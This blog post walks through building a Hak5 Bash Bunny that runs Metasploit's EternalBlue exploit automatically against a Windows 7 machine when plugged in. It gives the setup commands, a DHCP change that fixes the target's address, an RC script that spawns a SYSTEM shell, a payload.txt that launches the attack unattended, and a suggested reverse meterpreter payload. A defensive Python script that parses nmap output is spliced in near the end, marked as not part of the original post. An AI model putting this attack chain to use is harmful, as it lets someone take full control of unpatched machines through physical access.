Bashbunny with Metasploit ms17_010_eternalblue vs. Windows 7 SP1 x64

I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0 A-Wing that I used 6 years ago.

The Bashbunny is capable of running the Metasploit framework, as it has 512 MB of RAM, an ARMv7 CPU (v7l) and 3 GB of internal flash storage.

The EternalBlue exploit that has been ported to the Metasploit framework is an ideal candidate for automated exploitation from the Bashbunny. A true hacking device :)

So let's first prepare the Bashbunny device (make sure you can SSH to the device and set up internet connection sharing; the setup is covered here). I have done all the setup on a Linux system.

We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny, so here are the rough steps I followed.

Make sure to set a date for TLS/SSL to work ;) (with a wrong clock, certificate validity checks fail)

# date -s "20170523"

Add this line to /etc/apt/sources.list:
deb http://http.us.debian.org/debian/ jessie-updates main
# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev

# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh 
# rvm requirements
# rvm list known
# rvm install 2.3.3
# vi /root/.bashrc
Add at the end:
source /etc/profile.d/rvm.sh
rvm use 2.3.3 --default


# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh 
# ./msf_vps_installer.sh 
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

You should be able to run Metasploit on the Bashbunny now.

Now that we have a working Metasploit on the Bashbunny, all that is really needed is to arm it and load the EternalBlue exploit via a Metasploit RC script. Here is an example script, eternal-cmd.rc (the remote IP is the address that the Bashbunny's DHCPD will assign to the target system you connect it to).

Check /etc/dhcp/dhcpd.conf: the default is range 172.16.64.10 172.16.64.12; set it to a single address, range 172.16.64.64 172.16.64.64, so the target always receives that IP.

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit

The above is ideal when we want to get an NT AUTHORITY\SYSTEM shell on the target Windows 7 SP1 x64 (unlocked desktop).

If the target is locked, we can use another payload instead.

Something like windows/x64/meterpreter/reverse_https would be ideal, as we already know the LHOST value for the Bashbunny.

So RHOST would again be 172.16.64.64 and LHOST 172.16.64.1 … This can easily be scripted via a Metasploit RC script too ;)

The Metasploit RC scripts should be placed in /root/metasploit-framework on the Bashbunny so we can call them from the payload.txt for the corresponding attack switch position.

So ideally the payload.txt (for switch1 or switch2) would look like this:

#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# Set the current time (the device does not keep it) ..... check your watch
date -s "20170523 23:23"
LED ATTACK
# Run msfconsole with the RC script in the background so the LED sequence completes
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
LED FINISH

The target Windows 7 must have SMB port 445 reachable from the USB network that the Bashbunny device creates. A default Windows install has the firewall on, so the attack won't work there because the port is blocked. For demonstration purposes we assume the firewall is off.

After a while you should get an NT AUTHORITY\SYSTEM cmd shell popping up on the Win 7 desktop :)

This is an nmap scan of the target Windows 7 after the successful EternalBlue attack:

Host is up, received arp-response (0.0014s latency).
Scanned at 2017-05-23 23:09:43 for 149s
Not shown: 990 closed ports
Reason: 990 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
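As an added example (not part of the original post), here is a small Python triage script that parses scan output in the format shown above, using the post's lines as a constructed sample, and reports whether SMB is reachable on a host fingerprinted as Windows 7-10, which is exactly the precondition the post notes the default firewall would block:

```python
import re
from typing import Dict, List

# Constructed sample: a subset of the port lines shown in the post.
SAMPLE_NMAP = """\
Host is up, received arp-response (0.0014s latency).
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
"""

# nmap -sV --reason port line: "<port>/<proto> <state> <service> <reason> [ttl N] <version>"
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s+(\S+)\s+(?:ttl\s+\d+\s+)?(.*)$"
)

VERDICT_OK = "ok: TCP/445 not reachable from this network (firewall or service off)"
VERDICT_HIGH = ("high: SMB reachable on a Windows 7-10 host; confirm the MS17-010 "
                "patch, disable SMBv1 and block 445 on untrusted interfaces")
VERDICT_MED = "medium: SMB reachable; verify host OS and patch level"


def parse_ports(text: str) -> List[Dict[str, object]]:
    """Turn nmap normal-output port lines into dicts; other lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(6).strip()})
    return ports


def assess_smb_exposure(ports: List[Dict[str, object]]) -> Dict[str, object]:
    """Flag reachable SMB and whether the banner places the host in the 7-10 range."""
    smb = next((p for p in ports if p["port"] == 445 and p["state"] == "open"), None)
    exposed = smb is not None
    win7_family = exposed and "Windows 7" in str(smb["version"])
    verdict = VERDICT_OK if not exposed else (VERDICT_HIGH if win7_family else VERDICT_MED)
    return {"smb_exposed": exposed, "windows7_family": win7_family, "verdict": verdict}


if __name__ == "__main__":
    print(assess_smb_exposure(parse_ports(SAMPLE_NMAP))["verdict"])
```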

Here is a short demo (done in VirtualBox, simulating the actual Bashbunny attack).

About astr0baby
